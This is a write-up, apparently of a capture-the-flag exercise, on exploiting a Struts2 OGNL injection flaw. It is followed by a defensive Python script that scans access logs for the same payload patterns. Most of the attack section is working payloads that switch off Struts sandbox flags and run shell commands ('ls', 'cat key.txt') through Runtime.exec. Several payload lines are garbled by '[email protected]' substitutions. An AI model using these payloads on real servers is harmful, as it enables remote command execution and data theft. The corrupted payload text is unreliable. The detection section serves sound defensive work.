1. Request /${1+1}.action; the expression is evaluated, which proves the vulnerability exists.

2. Write the exploit

${
#context['xwork.methodaccessor.denymethodexecution']=false,
#m=#_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess'),
#m.setaccessible(true),
#m.set(#_memberaccess,true),
#[email protected]@tostring(@[email protected]().exec('ls').getinputstream()),
#q
}.action

3. Execution failed; URL-encode the exploit and submit it again

%24%7b%23context%5b%27xwork.methodaccessor.denymethodexecution%27%5d%3dfalse%2c
%23m%3d%23_memberaccess.getclass%28%29.getdeclaredfield%28%27allowstaticmethodaccess%27%29%2c
%23m.setaccessible%28true%29%2c
%23m.set%28%23_memberaccess%2ctrue%29%2c%23q%[email protected]@tostring%[email protected]@getruntime%28%29.exec%28%27ls%27%29.getinputstream%28%29%29%2c%23q%7d.action

4. Get the key

%24%7b
%23context%5b%27xwork.methodaccessor.denymethodexecution%27%5d%3dfalse%2c
%23m%3d%23_memberaccess.getclass%28%29.getdeclaredfield%28%27allowstaticmethodaccess%27%29%2c
%23m.setaccessible%28true%29%2c
%23m.set%28%23_memberaccess%2ctrue%29%2c%23q%[email protected]@tostring%[email protected]@getruntime%28%29.exec%28%27cat%20key.txt%27%29.getinputstream%28%29%29%2c%23q%7d.action

Payload

/%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27cat%20key.txt%27%29.getInputStream%28%29%29%2C%23q%7D.action

Decoded

/${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#[email protected]@toString(@[email protected]().exec('cat key.txt').getInputStream()),#q}.action
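From the defender's side, the decoded payload above is useful because it shows exactly what an OGNL injection against this Struts2 endpoint has to carry: an expression wrapper (${...}), a reference to #_memberAccess, and writes to the two sandbox flags denyMethodExecution and allowStaticMethodAccess. The following detection script is an added example, not part of the original writeup: it percent-decodes request paths from access-log lines (repeatedly, so a double-encoded path as in step 3 is still caught), lower-cases them (the page shows the same payload in both lowercase and camelCase forms, so matching must be case-insensitive) and reports which indicators were seen. The log format, IPs and indicator names are constructed for the example.

```python
import re
from urllib.parse import unquote

# Indicators of Struts2/OGNL expression injection, applied to the fully
# decoded, lower-cased request path. Names are this example's own labels.
OGNL_INDICATORS = [
    ("ognl_expression",       re.compile(r"[$%]\{")),
    ("member_access_bypass",  re.compile(r"#_memberaccess")),
    ("static_method_flag",    re.compile(r"allowstaticmethodaccess")),
    ("deny_method_exec_flag", re.compile(r"denymethodexecution")),
    ("runtime_exec",          re.compile(r"@java\.lang\.runtime@|\.exec\(")),
]

# Constructed sample access-log lines (Apache/Tomcat-like format); the third
# line is a truncated form of the flag-flipping prefix shown on this page.
SAMPLE_LOG = [
    '10.0.0.2 - - [10/Oct/2023:13:55:01 +0000] "GET /index.action HTTP/1.1" 200 1024',
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /%24%7B1%2B1%7D.action HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Oct/2023:13:56:02 +0000] "GET /%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%7D.action HTTP/1.1" 200 2048',
    '10.0.0.7 - - [10/Oct/2023:13:57:10 +0000] "GET /%2524%257B1%252B1%257D.action HTTP/1.1" 404 256',
]

# Groups: client IP, request path, status code.
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})'
)


def fully_decode(path, max_rounds=3):
    """Percent-decode until the string stops changing, so that a
    double-encoded payload (%2524 -> %24 -> $) is seen in its final form."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def ognl_indicators(path):
    """Return the names of all indicators present in the request path."""
    lowered = fully_decode(path).lower()
    return [name for name, rx in OGNL_INDICATORS if rx.search(lowered)]


def scan_access_log(lines):
    """Return (client_ip, raw_path, indicators) for every line that
    parses as a request and carries at least one indicator."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, path, _status = m.groups()
        found = ognl_indicators(path)
        if found:
            hits.append((ip, path, found))
    return hits


if __name__ == "__main__":
    for ip, path, found in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {', '.join(found)}")
        print(f"    decoded: {fully_decode(path)}")
```

The bare ${...} probe from step 1 trips only the first indicator; the flag-flipping prefix trips four. In practice the expression wrapper alone is a noisy signal, so weight the sandbox-flag and #_memberAccess indicators higher and treat any request that writes to them as a confirmed exploitation attempt rather than a scan.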